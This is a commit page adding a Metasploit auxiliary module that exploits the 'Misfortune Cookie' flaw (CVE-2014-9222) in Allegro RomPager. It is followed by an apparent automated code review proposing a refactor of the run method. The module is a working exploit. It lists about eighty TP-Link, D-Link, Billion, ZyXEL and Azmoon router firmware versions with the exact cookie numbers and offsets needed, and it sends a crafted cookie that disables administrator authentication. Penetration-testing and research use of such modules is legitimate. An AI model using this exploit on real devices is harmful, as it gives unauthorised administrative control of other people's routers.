Commit b377cd8

Allegrosoft rompager auth bypass auxiliary module
1 parent e0ff885 commit b377cd8

Lines changed: 293 additions & 0 deletions
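--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE
@@ -0,0 +1,293 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+include Msf::Exploit::Remote::HttpClient
+include Msf::Auxiliary::Report
+
+def initialize(info = {})
+super(update_info(
+info,
+'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication bypass",
+'Description' => %q(
+This module exploits HTTP servers that appear to be vulnerable to the
+'Misfortune Cookie' vulnerability which affects Allegro Software
+Rompager versions before 4.34 and can allow attackers to authenticate
+to the HTTP service as an administrator without providing valid
+credentials.
+),
+'Author' => [
+'Jon Hart <jon_hart[at]rapid7.com>', # metasploit scanner module
+'Jan Trencansky <jan.trencansky[at]gmail.com>', # metasploit auxiliary admin module
+'Lior Oppenheim' # CVE-2014-9222
+],
+'References' => [
+['CVE', '2014-9222'],
+['URL', 'http://mis.fortunecook.ie'],
+['URL', 'http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf'], # list of likely vulnerable devices
+['URL', 'http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC
+],
+'DisclosureDate' => 'Dec 17 2014',
+'License' => MSF_LICENSE
+))
+
+register_options(
+[
+OptString.new('TARGETURI', [true, 'URI to test', '/']),
+OptInt.new('device',[true, 'ID of device from list of vulnerable devices'])
+], Exploit::Remote::HttpClient
+)
+
+register_advanced_options(
+[
+#OptString.new('COOKIE_NUMBER',[false, 'Value used in cookie e.g. 107373883']),
+#OptInt.new('COOKIE_OFFSET',[false, 'Value of offset in cookie']),
+OptString.new('CANARY_URI', [false, 'Try overwriting the requested URI with this canary value (empty for random)']),
+OptString.new('STATUS_CODES_REGEX', [true, 'Ensure that canary pages and probe responses have status codes that match this regex', '^40[134]$'])
+], self.class
+)
+end
+
+def headers
+{
+'Referer' => full_uri
+}
+end
+
+def devices_list
+[
+{:name=> 'Azmoon', :model=>'AZ-D140W', :fw=>'2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1', :number=> 107367693,
+:offset=> 13}, # 0x803D5A79 # tested
+{:name=> 'Billion', :model=>'BiPAC 5102S', :fw=>'Av2.7.0.23 (UE0.B1C)', :number=> 107369694, :offset=> 13},
+# 0x8032204d # ----------
+{:name=> 'Billion', :model=>'BiPAC 5102S', :fw=>'Bv2.7.0.23 (UE0.B1C)', :number=> 107369694, :offset=> 13},
+# 0x8032204d # ----------
+{:name=> 'Billion', :model=>'BiPAC 5200', :fw=>'2.11.84.0(UE2.C2)3.11.11.6', :number=> 107369545,
+:offset=> 9}, # 0x803ec2ad # ----------
+{:name=> 'Billion', :model=>'BiPAC 5200', :fw=>'2_11_62_2_ UE0.C2D_3_10_16_0', :number=> 107371218,
+:offset=> 21}, # 0x803c53e5 # ----------
+{:name=> 'Billion', :model=>'BiPAC 5200A', :fw=>'2_10_5 _0(RE0.C2)3_6_0_0', :number=> 107366366,
+:offset=> 25}, # 0x8038a6e1 # ----------
+{:name=> 'Billion', :model=>'BiPAC 5200A', :fw=>'2_11_38_0 (RE0.C29)3_10_5_0', :number=> 107371453,
+:offset=> 9}, # 0x803b3a51 # ----------
+{:name=> 'Billion', :model=>'BiPAC 5200GR4', :fw=>'2.11.91.0(RE2.C29)3.11.11.52', :number=> 107367690,
+:offset=> 21}, # 0x803D8A51 # tested
+{:name=> 'Billion', :model=>'BiPAC 5200SRD', :fw=>'2.10.5.0 (UE0.C2C) 3.6.0.0', :number=> 107368270,
+:offset=> 1}, # 0x8034b109 # ----------
+{:name=> 'Billion', :model=>'BiPAC 5200SRD', :fw=>'2.12.17.0_UE2.C3_3.12.17.0', :number=> 107371378,
+:offset=> 37}, # 0x8040587d # ----------
+{:name=> 'Billion', :model=>'BiPAC 5200SRD', :fw=>'2_11_62_2(UE0.C3D)3_11_11_22', :number=> 107371218,
+:offset=> 13}, # 0x803c49d5 # ----------
+{:name=> 'D-Link', :model=>'DSL-2520U', :fw=>'Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL',
+:number=> 107368902, :offset=> 25}, # 0x803fea01 # tested
+{:name=> 'D-Link', :model=>'DSL-2600U', :fw=>'Z1_DSL-2600U', :number=> 107366496, :offset=> 13},
+# 0x8040637d # ----------
+{:name=> 'D-Link', :model=>'DSL-2600U', :fw=>'Z2_V1.08_ras', :number=> 107360133, :offset=> 20},
+# 0x803389B0 # ----------
+{:name=> 'TP-Link', :model=>'TD-8616', :fw=>'V2_080513', :number=> 107371483, :offset=> 21},
+# 0x80397055 # ----------
+{:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V4_100528_Russia', :number=> 107369790, :offset=> 17},
+# 0x803ae0b1 # ----------
+{:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V4_100524', :number=> 107369790, :offset=> 17},
+# 0x803ae0b1 # ----------
+{:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V5_100528_Russia', :number=> 107369790, :offset=> 17},
+# 0x803ae0b1 # ----------
+{:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V5_100524', :number=> 107369790, :offset=> 17},
+# 0x803ae0b1 # tested
+{:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V5_100903', :number=> 107369790, :offset=> 17},
+# 0x803ae0b1 # ----------
+{:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V6_100907', :number=> 107371426, :offset=> 17},
+# 0x803c6e09 # ----------
+{:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V7_111103', :number=> 107371161, :offset=> 1},
+# 0x803e1bd5 # ----------
+{:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V7_130204', :number=> 107370211, :offset=> 5},
+# 0x80400c85 # ----------
+{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V5_100524', :number=> 107369790, :offset=> 17},
+# 0x803ae0b1 # ----------
+{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V5_100702_TR', :number=> 107369790, :offset=> 17},
+# 0x803ae0b1 # ----------
+{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V5_100903', :number=> 107369790, :offset=> 17},
+# 0x803ae0b1 # ----------
+{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V6_100907', :number=> 107369788, :offset=> 1},
+# 0x803b6e09 # ----------
+{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V6_101221', :number=> 107369788, :offset=> 1},
+# 0x803b6e09 # ----------
+{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V7_110826', :number=> 107369522, :offset=> 25},
+# 0x803d1bd5 # ----------
+{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V7_130217', :number=> 107369316, :offset=> 21},
+# 0x80407625 # ----------
+{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V7_120509', :number=> 107369321, :offset=> 9},
+# 0x803fbcc5 # tested
+{:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V8_140311', :number=> 107351277, :offset=> 20},
+# 0x8024E148 # tested
+{:name=> 'TP-Link', :model=>'TD-8820', :fw=>'V3_091223', :number=> 107369768, :offset=> 17},
+# 0x80397E69 # tested
+{:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V1_080520', :number=> 107369845, :offset=> 5},
+# 0x80387055 # ----------
+{:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V2_100525', :number=> 107369790, :offset=> 17},
+# 0x803ae0b1 # tested
+{:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V2_100702_TR', :number=> 107369790, :offset=> 17},
+# 0x803ae0b1 # ----------
+{:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V2_090609', :number=> 107369570, :offset=> 1},
+# 0x803c65d5 # ----------
+{:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V3_101208', :number=> 107369766, :offset=> 17},
+# 0x803c3e89 # tested
+{:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V3_110221', :number=> 107369764, :offset=> 5},
+# 0x803d1a09 # ----------
+{:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V3_120531', :number=> 107369688, :offset=> 17},
+# 0x803fed35 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V1_090107', :number=> 107367772, :offset=> 37},
+# 0x803bf701 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V1_090107', :number=> 107367808, :offset=> 21},
+# 0x803e5b6d # ----------
+{:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V2_100819', :number=> 107367751, :offset=> 21},
+# 0x803dc701 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V2_101015_TR', :number=> 107367749, :offset=> 13},
+# 0x803e1829 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V2_101101', :number=> 107367749, :offset=> 13},
+# 0x803e1829 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V3_110119', :number=> 107367765, :offset=> 25},
+# 0x804bb941 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V3_120213', :number=> 107367052, :offset=> 25},
+# 0x804e1ff9 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V3_120604', :number=> 107365835, :offset=> 1},
+# 0x804f16a9 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8151N', :fw=>'V3_120530', :number=> 107353867, :offset=> 24},
+# 0x8034F3A4 # tested
+{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V1_080522', :number=> 107367787, :offset=> 21},
+# 0x803AB30D # tested
+{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V1,2_080522', :number=> 107368013, :offset=> 5},
+# 0x803AB30D # ----------
+{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V2_090113_Turkish', :number=> 107368013, :offset=> 5},
+# 0x803AB30D # ----------
+{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V3_140512', :number=> 107367854, :offset=> 9},
+# 0x803cf335 # tested
+{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V3_100603', :number=> 107367751, :offset=> 21},
+# 0x803DC701 # tested
+{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V3_100702_TR', :number=> 107367751, :offset=> 21},
+# 0x803DC701 # tested
+{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V3_100901', :number=> 107367749, :offset=> 13},
+# 0x803E1829 # tested
+{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V6_110119', :number=> 107367765, :offset=> 25},
+# 0x804BB941 # tested
+{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V6_110915', :number=> 107367682, :offset=> 21},
+# 0x804D7CB9 # tested
+{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V6_120418', :number=> 107365835, :offset=> 1},
+# 0x804F16A9 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V6_120213', :number=> 107367052, :offset=> 25},
+# 0x804E1FF9 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8901GB', :fw=>'V3_100727', :number=> 107367756, :offset=> 13},
+# 0x803dfbe9 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8901GB', :fw=>'V3_100820', :number=> 107369393, :offset=> 21},
+# 0x803f1719 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8901N', :fw=>'V1_111211', :number=> 107353880, :offset=> 0},
+# 0x8034FF94 # tested
+{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V1_101124,100723,100728', :number=> 107369839, :offset=> 25},
+# 0x803d2d61 # tested
+{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V1_110907', :number=> 107369876, :offset=> 13},
+# 0x803d6ef9 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V1_111125', :number=> 107369876, :offset=> 13},
+# 0x803d6ef9 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V3.0_110729_FI', :number=> 107366743, :offset=> 21},
+# 0x804ef189 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V3_110721', :number=> 107366743, :offset=> 21},
+# 0x804ee049 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V3_20110729_FI', :number=> 107366743, :offset=> 21},
+# 0x804ef189 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V4_120511', :number=> 107364759, :offset=> 25},
+# 0x80523979 # tested
+{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V4_120607', :number=> 107364759, :offset=> 13},
+# 0x80524A91 # tested
+{:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V4_120912_FL', :number=> 107364760, :offset=> 21},
+# 0x80523859 # tested
+{:name=> 'TP-Link', :model=>'TD-W8961NB', :fw=>'V1_110107', :number=> 107369844, :offset=> 17},
+# 0x803de3f1 # tested
+{:name=> 'TP-Link', :model=>'TD-W8961NB', :fw=>'V1_110519', :number=> 107369844, :offset=> 17},
+# 0x803de3f1 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8961NB', :fw=>'V2_120319', :number=> 107367629, :offset=> 21},
+# 0x80531859 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8961NB', :fw=>'V2_120823', :number=> 107366421, :offset=> 13},
+# 0x80542e59 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V1_100722,101122', :number=> 107369839, :offset=> 25},
+# 0x803D2D61 # tested
+{:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V1_101022_TR', :number=> 107369839, :offset=> 25},
+# 0x803D2D61 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V1_111125', :number=> 107369876, :offset=> 13},
+# 0x803D6EF9 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V2_120427', :number=> 107364732, :offset=> 25},
+# 0x8052e0e9 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V2_120710_UK', :number=> 107364771, :offset=> 37},
+# 0x80523AA9 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V2_120723_FI', :number=> 107364762, :offset=> 29},
+# 0x8052B6B1 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V3_120524,120808', :number=> 107353880, :offset=> 0},
+# 0x803605B4 # ----------
+{:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V3_120830', :number=> 107353414, :offset=> 36},
+# 0x803605B4 # ----------
+{:name=> 'ZyXEL', :model=>'P-660R-T3', :fw=>'3.40(BOQ.0)C0', :number=> 107369567, :offset=> 21},
+# 0x803db071 # tested
+{:name=> 'ZyXEL', :model=>'P-660RU-T3', :fw=>'3.40(BJR.0)C0', :number=> 107369567, :offset=> 21}
+]
+end
+
+def auxiliary_commands
+{ "devices" => "List known vulnerable devices" }
+end
+
+def cmd_devices(*args)
+tbl = Msf::Ui::Console::Table.new(
+Msf::Ui::Console::Table::Style::Default,
+'Header' => "List of vulnerable devices",
+'Prefix' => "\n",
+'Postfix' => "\n",
+'Columns' =>
+[
+'ID',
+'Name',
+'Model',
+'Firmware',
+'Number',
+'Offset'
+])
+counter = 0
+for device in devices_list
+tbl << [counter, device[:name], device[:model], device[:fw], device[:number], device[:offset] ]
+counter += 1
+end
+print tbl.to_s
+#print_status("ID\tName")
+
+#for device in devices_list
+# print_status(counter.to_s + ":\t" + device[:name])
+# counter += 1
+#end
+end
+
+def run
+cookie = ''
+begin
+cookie_number = devices_list[datastore['DEVICE']][:number].to_s
+cookie_offset = devices_list[datastore['DEVICE']][:offset]
+cookie = 'C' + cookie_number + '=' + 'B' * cookie_offset + "\x00"
+rescue
+print_error('Device number is out of range, please run devices to see list of vulnerable devices')
+end
+print_status('Device name: ' + devices_list[datastore['DEVICE']][:name])
+print_status('Device model: ' + devices_list[datastore['DEVICE']][:model])
+print_status('Device firmware: ' + devices_list[datastore['DEVICE']][:fw])
+res = send_request_raw(
+'uri' => normalize_uri(target_uri.path.to_s),
+'method' => 'GET',
+'headers' => headers.merge('Cookie' => cookie)
+)
+if res != nil and res.code <= 302 # This may give wrong results if run against non rom-pager devices
+print_good('Exploit sent, please check host, authentication should be disabled')
+else
+print_error('Exploit failed')
+end
+end
+end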
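Review bot: In `run` the bare `rescue` at line 276 reports an out-of-range DEVICE but does not return, so execution falls through to the `print_status` calls at lines 279-281, which index `devices_list` with the same bad value and raise NoMethodError on nil (and had they not, the request at line 282 would go out with the empty cookie from line 271). A negative DEVICE also passes silently, because `Array#[]` indexes from the end, and the bare `rescue` would hide any other StandardError in the lookup. Resolving the device once, guarding with an explicit return, and building the cookie and status lines from that hash removes all three problems; a sketch follows. The same method should also replace `if res != nil and res.code <= 302` with `if res && res.code <= 302`, and `cmd_devices` at lines 256-260 reads better as `devices_list.each_with_index { |device, id| tbl << [id, device[:name], device[:model], device[:fw], device[:number], device[:offset]] }`, which also lets the commented-out loop at lines 262-267 be dropped.
```ruby
def run
  idx = datastore['DEVICE']
  device = idx && idx >= 0 ? devices_list[idx] : nil
  unless device
    print_error('Device number is out of range, please run devices to see list of vulnerable devices')
    return
  end
  cookie = "C#{device[:number]}=#{'B' * device[:offset]}\x00"
  print_status('Device name: ' + device[:name])
  print_status('Device model: ' + device[:model])
  print_status('Device firmware: ' + device[:fw])
  # … unchanged: send_request_raw call and response check …
end
```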
